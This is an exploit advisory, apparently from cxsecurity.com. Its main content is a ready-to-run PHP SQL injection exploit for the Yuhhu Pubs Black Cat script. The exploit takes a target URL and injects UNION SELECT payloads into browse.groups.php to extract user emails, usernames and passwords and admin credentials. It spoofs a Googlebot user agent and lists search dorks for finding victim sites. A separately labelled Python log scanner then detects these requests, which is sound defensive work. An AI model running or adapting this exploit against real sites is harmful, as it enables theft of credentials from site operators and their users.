Yuhhu Pubs Black Cat Remote SQL Injection Exploit

2008.07.15
Credit: RM
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php
/*
Coded By RMx
Yuhhu Pubs Black Cat Remote SQL Injection Exploit
Coderx.Org & Biyosecurity.com
Thanx : Liz0zim - Otistiq
Script Demo & Sales : http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhuscript/6-yuhhuserisi/8-pubs
Dork --> inurl: browse.groups.php
Dork 2 --> inurl:browse.events.php
Dork 3 --> browse.music.php
Dork 4 --> browse.groups.php
*/
set_time_limit(0);
error_reporting(0);
echo "
<title>Yuhhu Pubs Exploit [ Coded By RMx ]</title>
<form action='' method=post>
USERS EXPLOIT :<br>
Örnek :http://www.example.com<br>
<input type=text name='site'>
<input type=submit value=RMx>
</form>";
if (isset($_POST['site'])) {
    $site=$_POST['site'];
    $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D61696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,password),5,6,7,8,9+from+joovili_users";
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');
    curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
    $html = curl_exec($curl);
    curl_close($curl);
    preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);
    foreach ($huseyin[1] as $biyosecurity) {
        echo $biyosecurity ."<br>";
    }
}
echo "
<form action='' method=post>
ADMIN EXPLOIT :<br>
Örnek :http://www.example.com<br>
<input type=text name='admin'>
<input type=submit value=RMx>
</form>";
if (isset($_POST['admin'])) {
    $site=$_POST['admin'];
    $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B756C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,6,7,8,9+from+joovili_admins";
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');
    curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
    $html = curl_exec($curl);
    curl_close($curl);
    preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);
    foreach ($huseyin[1] as $biyosecurity) {
        echo $biyosecurity ."<br>";
    }
}
?>
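
For defenders, a log check for the request pattern this exploit produces. This is an added example, not part of the original advisory or the Yuhhu code base: it scans web access logs for browse.groups.php requests whose category parameter carries SQL. It assumes Combined Log Format and that legitimate category values are plain integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
PAGES = {"browse.groups.php"}   # script requested by the exploit on this page
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|\bconcat\s*\(|joovili_\w+", re.I | re.S)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.rsplit("/", 1)[-1].lower() not in PAGES:
        return None
    # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET
    reasons = set()
    for value in parse_qs(url.query, keep_blank_values=True).get("category", []):
        if not re.fullmatch(r"\d+", value.strip()):   # assumption: ids are integers
            reasons.add("category is not a plain integer")
        if SQL_TOKENS.search(value):
            reasons.add("SQL keywords in category")
    if not reasons:
        return None
    if "googlebot" in m["agent"].lower():
        reasons.add("claims Googlebot; confirm the source IP by reverse DNS")
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "reasons": sorted(reasons)}

def scan(lines):
    """Return findings for every suspicious line in an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE = [
    '198.51.100.7 - - [15/Jul/2008:10:00:01 +0000] "GET /browse.groups.php?category=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Jul/2008:10:02:13 +0000] "GET /browse.groups.php?category=-1+union+select+1,2,3+from+joovili_users HTTP/1.1" 200 7340 "http://www.google.com" "Googlebot/2.1 (+http://www.google.com/bot.html)"',
    '203.0.113.9 - - [15/Jul/2008:10:02:20 +0000] "GET /site/browse.groups.php?category=-1%20UNION%20SELECT%201 HTTP/1.1" 200 7100 "-" "curl/7.18"',
    '198.51.100.7 - - [15/Jul/2008:10:03:00 +0000] "GET /index.php?category=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit with status 200 only shows the request was served; whether data was returned has to be confirmed from response sizes or application logs.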

References:

http://xforce.iss.net/xforce/xfdb/43782
http://www.securityfocus.com/bid/30221
http://www.securityfocus.com/archive/1/archive/1/494319/100/0/threaded
http://secunia.com/advisories/31077


Copyright 2024, cxsecurity.com

 
